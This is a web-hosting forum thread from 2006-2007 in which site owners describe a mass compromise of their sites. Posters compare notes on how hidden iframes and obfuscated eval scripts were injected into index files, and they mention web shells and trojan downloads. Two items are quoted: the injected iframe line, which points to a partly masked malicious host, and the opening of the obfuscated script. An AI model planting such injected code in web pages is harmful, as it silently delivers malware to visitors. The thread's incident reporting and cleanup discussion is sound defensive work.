Virus issue has been resolved! Here is the latest news! - Page 6

bonehead · #**126** 11-25-2006, 10:37 PM

Quote:

Originally Posted by slapshotw

Yes, that is what happened. The virus affected windows machines, and was loaded through a cpanel exploit.

Thank god for firefox

gdwoods · #**127** 01-08-2007, 07:12 AM

Sorry to revive this thread, but approximately 16 hours ago several (I'm still checking) of my client sites were hacked. Here are the details:

File affected: index.php
Code injected: <iframe src="http://xxxx.org/go.php" width=1 height=1></iframe>

(note: to protect users of this forum I am NOT including the tld in the above url, but for the curious, substitue "wolf-ware" for the x's)

The index.php file permissions are set for 644.

I need to get back to checking the rest of my sites. I'll post more details as I can. Anyone else attacked?

vtrain · #**128** 01-08-2007, 08:17 AM

Quote:

Originally Posted by gdwoods

Sorry to revive this thread, but approximately 16 hours ago several (I'm still checking) of my client sites were hacked. Here are the details:

File affected: index.php
Code injected: <iframe src="http://xxxx.org/go.php" width=1 height=1></iframe>

(note: to protect users of this forum I am NOT including the tld in the above url, but for the curious, substitue "wolf-ware" for the x's)

The index.php file permissions are set for 644.

I need to get back to checking the rest of my sites. I'll post more details as I can. Anyone else attacked?

what was the forum software? Was it up2date?

gdwoods · #**129** 01-08-2007, 08:44 AM

UPDATE:

Approximately 90% of my sites were hit, I have no idea why some were skipped. Some sites were Joomla, others plain HTML and PHP.

The hacker added his code to all files that began with "index" (index.php, index2.php, index.shtml, index.bak, index.sav, etc...)

A handful of sites also had a script inserted, which began with "<script>eval(unescape('%64%6f%63%75%6d%65%6e%74.. .."

I saved the code if anyone wants to try to figure it out.

I put a ticket in to HG

gdwoods · #**130** 01-08-2007, 08:49 AM

Quote:

Originally Posted by vtrain

what was the forum software? Was it up2date?

I don't have any sites that are exclusively forums-driven but your message prompted me to go check the ones that have forums installed in sub-directories and they seem fine. It looks like the hack only affected the root folder.

The Joomla sites that were hit were all running the latest version.

By the way the code was injected at the bottom of the index files, except for one instance where the hacker put it at the top. That's how I found it, it was throwing up a headers error...

swexpert · #**131** 01-08-2007, 10:18 AM

Hi,
Was it on one specific server only or more? Did you notice any setRequestHeader method in the requests? I am trying to figure out an injection in default index file of the virtual server but it seems the kernel was compromised which injected text while the page was served.

Once infected, the pages download malwares to the users PC.

You might like to try this:
replace "baddomainyoucansee" "google" -- /pathto/public_html/*/index.*

This will basically replace the text which will give 404 and won't cause damage.

I am suspecting a kernel upgrade as a solution.

Regds
IJ

swexpert · #**132** 01-08-2007, 10:27 AM

BTW, Wondering if this has any relevance, although it is not remotely exploitable:
http://www.frsirt.com/english/advisories/2006/5002

Whatever it is, wish you a fast recovery!

Regds
IJ

swexpert · #**133** 01-11-2007, 10:58 AM

LOL! Mine got infected too!

For index.*, it adds to the top as well as bottom, for index*, it adds only to the bottom.

Regds
IJ

gdwoods · #**134** 01-11-2007, 11:24 AM

The hackers also replace the .htaccess file... It's a big mess...

gwyneth · #**135** 01-11-2007, 09:34 PM

Quote:

Originally Posted by gdwoods

Sorry to revive this thread, but approximately 16 hours ago several (I'm still checking) of my client sites were hacked. Here are the details:

File affected: index.php
Code injected: <iframe src="http://xxxx.org/go.php" width=1 height=1></iframe>

I need to get back to checking the rest of my sites. I'll post more details as I can. Anyone else attacked?

This thread discussed a similar iframe injection, and showed the info we found:

http://forums.hostgator.com/showthread.php?t=12642

swexpert · #**136** 01-21-2007, 02:34 PM

Hi,
Please shed some light if anyone can.

I have a reseller account and I have also got this IFRAME problem. HG support on day 1 said it has been fixed server side it was an error in apache. I was very happy.

Two days later it popped again and ever since, we clean the code, clean htaccess and within 24 hours it is again there. In my case the URL is a russian one (or lan gur dot org). It downloads multiple trojans on end users' machine (running windows).

HG support seems to just clean the files and clean the htaccess. unfortunately not all users have backups. So this can't go on forever. HG support says it is most likely an issue from client's insecure code or director/file access. However, we have done the coding and we have not included any files using variables. No directories/files are 777. Forms use captcha code. No unusual things in awstats or access logs.

They dropped the r99 shell file(thankfully hg identifies it) and a tool that reads plaintext passwords from config files. They were removed but still the injection is there.

For 5 days, we clean the files and it comes there back within 24 hours.

Has anyone successfully killed this issue?Any thoughts?

Regds
IJ

blakeh · #**137** 01-21-2007, 10:19 PM

I had these guys harden my dedicated box after I got hit by the iframe deal.

http://www.webhostgear.com

HG support wiped and reloaded the box and restored backup, then had WHG harden the box and it hasn't been rooted since.

bh

gdwoods · #**138** 01-23-2007, 09:45 AM

Sorry if this sounds stupid, but have you changed your passwords?

Quote:

Originally Posted by swexpert

Hi,
Please shed some light if anyone can.

I have a reseller account and I have also got this IFRAME problem. HG support on day 1 said it has been fixed server side it was an error in apache. I was very happy.

Two days later it popped again and ever since, we clean the code, clean htaccess and within 24 hours it is again there. In my case the URL is a russian one (or lan gur dot org). It downloads multiple trojans on end users' machine (running windows).

HG support seems to just clean the files and clean the htaccess. unfortunately not all users have backups. So this can't go on forever. HG support says it is most likely an issue from client's insecure code or director/file access. However, we have done the coding and we have not included any files using variables. No directories/files are 777. Forms use captcha code. No unusual things in awstats or access logs.

They dropped the r99 shell file(thankfully hg identifies it) and a tool that reads plaintext passwords from config files. They were removed but still the injection is there.

For 5 days, we clean the files and it comes there back within 24 hours.

Has anyone successfully killed this issue?Any thoughts?

Regds
IJ